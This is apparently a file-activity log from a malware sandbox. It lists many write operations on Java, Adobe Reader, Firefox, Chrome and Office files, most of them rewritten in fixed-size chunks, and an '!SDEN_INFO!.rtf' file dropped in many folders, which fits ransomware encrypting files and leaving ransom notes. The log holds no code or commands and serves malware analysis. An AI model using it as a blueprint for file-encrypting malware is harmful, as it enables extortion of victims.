| Write | C:\Program Files\Java\jre1.8.0_144\lib\calendars.properties | size = 2794 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages.properties | size = 4276 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\61.0.3163.79\Installer\chrome.7z | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_zh_HK.properties | size = 5168 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\jaccess.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\jaccess.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\flavormap.properties | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\flavormap.properties | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\flavormap.properties | size = 5344 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\javacpl.cpl | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\javacpl.cpl | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\orbd.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\orbd.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\unpack200.exe | size = 5512 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\unpack200.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaTypewriterRegular.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaTypewriterRegular.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\klist.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\klist.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\unpack200.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\javafx.properties | size = 1472 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\61.0.3163.79\Installer\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\management\jmxremote.access | size = 5414 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\cmm\PYCC.pf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\cmm\PYCC.pf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\java.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\java.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | size = 8998 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\cmm\GRAY.pf | size = 2048 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_ko.properties | size = 7128 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_it.properties | size = 4639 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\ktab.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\ktab.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash_11-lic.gif | size = 9221 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\resources.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\tnameserv.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\nashorn.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\nashorn.jar | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\nashorn.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\tnameserv.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\resources.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\resources.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\cmm\LINEAR_RGB.pf | size = 2460 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\cmm\!SDEN_INFO!.rtf | size = 7765 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunjce_provider.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunjce_provider.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash_11@2x-lic.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash_11@2x-lic.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\javaw.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\javaw.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunec.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunec.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\sound.properties | size = 2626 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_LinkDrop32x32.gif | size = 1584 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\management\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\javacpl.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\javacpl.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightDemiItalic.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightDemiItalic.ttf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\policytool.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\policytool.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jfxswt.jar | size = 5512 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jfxswt.jar | size = 16384 |
|
2 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | size = 61440 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\accessibility.properties | size = 1565 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_CopyDrop32x32.gif | size = 1581 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\net.properties | size = 5880 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\java.security | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\java.security | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi | size = 5512 |
|
2 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi | size = 4096 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightItalic.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightItalic.ttf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\content-types.properties | size = 6964 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jfr\profile.jfc | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\THIRDPARTYLICENSEREADME-JAVAFX.txt | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\THIRDPARTYLICENSEREADME-JAVAFX.txt | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jfr\profile.jfc | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\management-agent.jar | size = 1797 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\COPYRIGHT | size = 4660 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_CopyNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_sv.properties | size = 4825 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\cmm\sRGB.pf | size = 4560 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_pt_BR.properties | size = 4701 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jfr\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\clicktoplay-rollout@mozilla.org.xpi | size = 7283 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi | size = 61440 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\dictionaries\en-US.aff | size = 4490 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\access-bridge-64.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\access-bridge-64.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\cacerts | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\cacerts | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\README.txt | size = 1462 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\!SDEN_INFO!.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\!SDEN_INFO!.rtf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jfr.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jfr.jar | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jfr.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunmscapi.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunmscapi.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\cldrdata.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\cldrdata.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\cldrdata.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi | size = 9227 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\maintenanceservice.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\meta-index | size = 3542 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaSansDemiBold.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\omni.ja | size = 9608 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png | size = 5512 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\omni.ja | size = 61440 |
|
8 | |
| Write | C:\Program Files\Mozilla Firefox\omni.ja | size = 32768 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaSansDemiBold.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\update-settings.ini | size = 1548 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\freebl3.chk | size = 2315 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_LinkNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\maintenanceservice.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\java.policy | size = 3882 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\release | size = 2062 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\release | size = 1944 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\aushelper@mozilla.org.xpi | size = 5512 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\aushelper@mozilla.org.xpi | size = 4096 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\extensions\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jsse.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jsse.jar | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jsse.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunpkcs11.jar | size = 5512 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunpkcs11.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ca-ES\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ca-ES\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\plugin.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\plugin.jar | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\plugin.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\javaws.policy | size = 1514 |
|
1 | |
| Write | C:\Program Files\rempl\Logs\Remediation.003.etl | size = 5512 |
|
1 | |
| Write | C:\Program Files\rempl\Logs\Remediation.003.etl | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\de-AT\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\de-AT\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-GB\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-GB\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-IN\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-IN\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-AR\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-AR\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-BE\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-BE\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-MX\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-MX\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\is-IS\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\is-IS\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nb-NO\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nb-NO\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunpkcs11.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets | size = 6598 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\jquery-3.1.1.min.js | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\jquery-3.1.1.min.js | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ru-RU\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ru-RU\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaSansRegular.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaSansRegular.ttf | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaSansRegular.ttf | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_MoveDrop32x32.gif | size = 1563 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ar-sa\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ar-sa\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-HK\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-HK\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json | size = 2843 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json | size = 1643 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\dictionaries\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jvm.hprof.txt | size = 5642 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\psfont.properties.ja | size = 4212 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\THIRDPARTYLICENSEREADME.txt | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\THIRDPARTYLICENSEREADME.txt | size = 32768 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-XF\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-XF\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\LanguageSelector.js | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\LanguageSelector.js | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-AU\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-AU\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.009.etl | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.009.etl | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp | size = 1818 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\local_policy.jar | size = 4943 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\Welcome.html | size = 2371 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp | size = 1858 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\precomplete | size = 5455 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\pl-PL\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\pl-PL\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-US\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-US\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\style.min.css | size = 5642 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sv-SE\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sv-SE\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.003.etl | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.003.etl | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp | size = 1828 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\eu-ES\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\eu-ES\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\bg-BG\index.html | size = 5512 |
|
1 | |
